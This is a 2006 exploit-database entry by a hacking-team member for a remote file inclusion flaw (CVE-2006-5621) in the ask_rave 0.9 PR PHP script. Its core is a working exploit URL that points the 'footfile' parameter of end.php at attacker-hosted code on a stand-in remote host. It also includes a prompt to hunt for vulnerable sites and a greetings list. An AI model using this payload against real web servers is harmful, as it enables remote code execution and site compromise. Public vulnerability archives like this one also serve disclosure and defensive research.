ask_rave <= 0.9 PR end.php footfile Remote File Include Vulnerability

2006-10-26T00:00:00
ID EDB-ID:2654
Type exploitdb
Reporter v1per-haCker
Modified 2006-10-26T00:00:00

Description

ask_rave <= 0.9 PR (end.php footfile) Remote File Include Vulnerability. CVE-2006-5621. Webapps exploit for php platform

                                        
                                            #==================================================================
#  ask_rave (RFI)
#==================================================================
# Info:-
#
# Scripts:  ask_rave
# Download: http://rave.jk-digital.com/site/scripts/files/ask_0_9PR.zip
# Version : 0.9 PR
# Dork & vuln : download scripts and think :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/end.php?footfile=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#               ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#           metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero
#And all members in XP10_hackEr Team
#Thanx to str0ke :)
#WWW.XP10.COM
#
===================================================================

# milw0rm.com [2006-10-26]